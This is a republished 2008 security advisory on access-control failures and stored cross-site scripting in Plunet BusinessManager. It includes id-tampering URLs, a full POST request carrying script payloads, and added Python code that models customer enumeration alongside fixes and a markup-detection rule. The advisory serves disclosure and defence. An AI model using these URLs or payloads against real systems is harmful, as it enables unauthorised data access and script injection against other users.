
Plunet BusinessManager Information Disclosure / XSS

Published 07 Jan 2009. Reported by Gabriele Zanoni. Source: packetstorm (packetstormsecurity.com)

Plunet BusinessManager: Failure in Access Controls; Stored Cross Site Scripting

Secure Network - Security Research Advisory
  
Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting   
vulnerabilities.  
Systems affected: Plunet BusinessManager  
Systems not affected:  
Severity: High  
Local/Remote: Remote  
Vendor URL: http://www.plunet.de  
Author(s): Matteo Ignaccolo [email protected] - Gabriele Zanoni   
[email protected]  
Relates to:   
Vendor disclosure: 23/09/2008  
Vendor acknowledged:  
Vendor patch release:  
Public disclosure: 23/12/2008  
Advisory number: SN-2008-04  
Advisory URL: http://www.securenetwork.it/advisories/  
  
*** SUMMARY ***  
  
Plunet BusinessManager is a software suite for translation companies that
offers, on a single platform, a solution to handle customers, translators,
document management, data, order management and processing.
Because Plunet BusinessManager does not correctly validate some input
forms, Stored Cross Site Scripting attacks are possible.
Moreover, customers and translators can access data and files that do not
belong to them.
  
*** VULNERABILITY DETAILS ***  
  
The application fails to enforce access control on data and files.
Any user (Customer or Translator) can retrieve and alter data and files
not related to them. A user can also easily enumerate all of the Company's
customers, since the resource identifiers are predictable and unchecked.
  
The application fails to validate the QUB and Bez74 parameters, so stored
Cross Site Scripting attacks are possible: the injected markup is saved with
the order and rendered to anyone who later views it.
  
  
*** EXPLOIT ***  
  
An authenticated Customer can use the following URL to access another
Customer's private area (the <CUSTOMER-ID> is not checked against the
session):

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/<CUSTOMER-ID>
  
An authenticated Translator can use the following URL to access Orders not
assigned to them:

http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/C-00042/PRM
  
An authenticated Translator can use the following URL to access Jobs not
assigned to them (vary the OSG05 job id to browse other jobs):

http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944
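The three URLs above share one root cause: the directory or record to show is taken from the request (Pfad, OSG05) and never compared with who is logged in. The following is an added example, not Plunet's code, that models the flaw and the scoped check that closes it. The repository layout (/Customer/<id>, /ORDER/<id>/PRM), the Session class and the file names are assumptions constructed for this example; only the path shapes come from the advisory's URLs.

```python
"""Added example (not Plunet's code): the Pfad access-control failure in
code, plus a session-scoped check that closes it.

The repository layout, the Session class and the entry names are
assumptions constructed for this example.
"""
from dataclasses import dataclass
from posixpath import normpath

# Constructed document store: directory path -> entries it contains.
REPO = {
    "/Customer/1449": ["quote.pdf", "contract.docx"],
    "/Customer/1450": ["offer-other-client.pdf"],
    "/ORDER/C-00042/PRM": ["source.doc", "target.doc"],
    "/ORDER/C-00043/PRM": ["unrelated-order.doc"],
}


@dataclass
class Session:
    role: str                 # "customer" or "translator"
    customer_id: str = ""     # set for customers
    order_ids: tuple = ()     # orders assigned to a translator


def list_dir_vulnerable(session: Session, pfad: str):
    """Mirrors the advisory's flaw: the listed directory comes straight from
    the client-supplied Pfad parameter; the session is never consulted."""
    return REPO.get(normpath(pfad))


def enumerate_customers(session: Session, id_range):
    """Abuse of the flaw: walk candidate ids and keep the ones that exist.
    This is the customer enumeration the advisory describes."""
    return [str(i) for i in id_range
            if list_dir_vulnerable(session, f"/Customer/{i}") is not None]


def allowed_roots(session: Session):
    """Directories this principal may see, derived from the session only."""
    if session.role == "customer" and session.customer_id:
        return [f"/Customer/{session.customer_id}"]
    if session.role == "translator":
        return [f"/ORDER/{oid}" for oid in session.order_ids]
    return []


def in_scope(session: Session, pfad: str) -> bool:
    """True only if the normalised path sits inside one of the allowed roots.
    Normalising first defeats /Customer/1449/../1450; the root + "/" test
    stops /Customer/14490 from matching the root /Customer/1449."""
    target = normpath("/" + pfad.lstrip("/"))
    return any(target == root or target.startswith(root + "/")
               for root in allowed_roots(session))


def list_dir_hardened(session: Session, pfad: str):
    """Same listing, refused unless the path is within the caller's scope."""
    if not in_scope(session, pfad):
        raise PermissionError(f"{pfad!r} is outside the caller's scope")
    return REPO.get(normpath("/" + pfad.lstrip("/")))


if __name__ == "__main__":
    me = Session(role="customer", customer_id="1449")
    print("vulnerable, other customer:", list_dir_vulnerable(me, "/Customer/1450"))
    print("enumerated ids:", enumerate_customers(me, range(1440, 1460)))
    print("hardened, own folder:", list_dir_hardened(me, "/Customer/1449"))
    try:
        list_dir_hardened(me, "/Customer/1449/../1450")
    except PermissionError as err:
        print("hardened, traversal refused:", err)
```

The point of `in_scope` is that the allowed root is computed from the session, not parsed out of the request; the request only chooses a path inside that root, and anything that normalises to somewhere else is refused before any lookup happens.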
  
Stored Cross Site Scripting  
  
POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1  
Host: <HOSTNAME> or IP  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Proxy-Connection: keep-alive  
Referer: http://<hostname or IP>/pagesUTF8/auftrag_allgemeinauftrag.jsp  
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 1085  
  
TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&  
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29  
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14  
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&  
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&  
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&  
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&  
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&  
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&  
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=  
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&  
CheckXYZ=Send&yOffsetScroll=0  
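The two injected fields in the body above are QUB and Bez74, each carrying a percent-encoded `"><script>...</script>` that breaks out of an attribute when the stored order is rendered. The following added example (not Plunet's code) decodes an excerpt of that body, flags the fields that carry markup, which is the kind of rule an application firewall could apply as the advisory's only workaround, and shows the application-side fix: escaping stored values when they are written into HTML. The BODY string is an excerpt of the request body on this page with unrelated fields dropped, and the `<input>` markup used for rendering is an assumption about how the fields are displayed.

```python
"""Added example (not Plunet's code): find the injected fields in the
advisory's POST body and show the output-encoding fix.

BODY is an excerpt of the request body from the advisory; the <input>
rendering is an assumption about how the fields are displayed.
"""
import html
import re
from urllib.parse import parse_qs

# Excerpt of the advisory's request body, constructed from the page.
BODY = (
    "TokenUAID=42&QUK=1449&QUZ=sample"
    "&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3B%3C%2Fscript%3E"
    "&QUG=sample"
    "&Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E"
    "&Bem74=sample&SaveButton=true"
)

# Deliberately simple: any value that opens an HTML tag. A production WAF
# rule set also looks for event handlers, javascript: URLs and encodings.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z!]")


def decode_body(body: str) -> dict:
    """Percent-decode the form into {name: value}, keeping blank fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_markup_params(body: str) -> dict:
    """Return the parameters whose decoded value contains markup."""
    return {k: v for k, v in decode_body(body).items() if TAG_RE.search(v)}


def render_field(name: str, value: str) -> str:
    """Vulnerable pattern: the stored value is concatenated into the page."""
    return f'<input name="{name}" value="{value}">'


def render_field_safe(name: str, value: str) -> str:
    """Fix: escape <, >, &, " and ' so the value cannot leave the attribute."""
    return f'<input name="{name}" value="{html.escape(value, quote=True)}">'


if __name__ == "__main__":
    for name, value in flag_markup_params(BODY).items():
        print(f"{name}: {value}")
        print("  unsafe:", render_field(name, value))
        print("  safe:  ", render_field_safe(name, value))
```

Flagging `<` in input is a stop-gap; the `%22%3E` prefix shows the payload first closes the attribute with a quote, so the durable fix is to escape every stored value at the point it is written into HTML, quotes included, regardless of what the input filter let through.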
  
  
*** FIX INFORMATION ***  
  
No patch is currently available.  
  
*** WORKAROUNDS ***  
  
No workaround is available, but some application firewalls and IPS can be   
reconfigured to thwart the attack.  
  
*********************  
*** LEGAL NOTICES ***  
*********************  
  
Secure Network (www.securenetwork.it) is an information security company,   
which provides consulting and training services, and engages in security   
research and development.   
  
We are committed to open, full disclosure of vulnerabilities, cooperating  
whenever possible with software developers for properly handling disclosure.  
  
This advisory is copyright 2008 Secure Network S.r.l. Permission is   
hereby granted for the redistribution of this alert, provided that it is  
not altered except by reformatting it, and that due credit is given. It   
may not be edited in any way without the express consent of Secure Network   
S.r.l. Permission is explicitly given for insertion in vulnerability   
databases and similars, provided that due credit is given to Secure Network.  
  
The information in the advisory is believed to be accurate at the time of   
publishing based on currently available information. This information is  
provided as-is, as a free service to the community by Secure Network   
research staff. There are no warranties with regard to this information.   
Secure Network does not accept any liability for any direct, indirect,  
or consequential loss or damage arising from use of, or reliance on,  
this information.  
  
If you have any comments or inquiries, or any issue with what is reported   
in this advisory, please inform us as soon as possible.  
  
E-mail: [email protected]  
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc  
Phone: +39 02 24 12 67 88  
  
  
--   
Dott. Ing. Matteo Ignaccolo  
  
Secure Network S.r.l.  
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia  
Tel: +39 02.24126788  
email: [email protected]  
web: www.securenetwork.it  
